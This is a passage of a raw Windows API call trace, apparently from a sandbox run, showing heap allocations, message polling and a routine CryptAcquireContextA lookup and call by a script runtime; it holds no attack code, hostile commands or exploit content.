RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0150.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0150.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.920] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0150.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0150.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0150.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0150.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0150.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0150.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0150.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0150.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0150.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0150.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0150.922] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0150.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0150.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0150.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0150.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0150.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0150.924] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0150.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0150.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0150.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0150.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0150.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0150.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0150.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0150.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e698c8 [0150.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0150.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0150.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0150.925] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0150.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0150.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0150.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0150.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0150.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0150.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0150.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0150.925] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0150.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0150.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0150.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0150.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0150.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0150.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0150.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0150.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0150.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0150.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0150.928] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0150.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0150.929] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0150.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0150.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0150.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0150.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0150.930] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.930] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0150.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 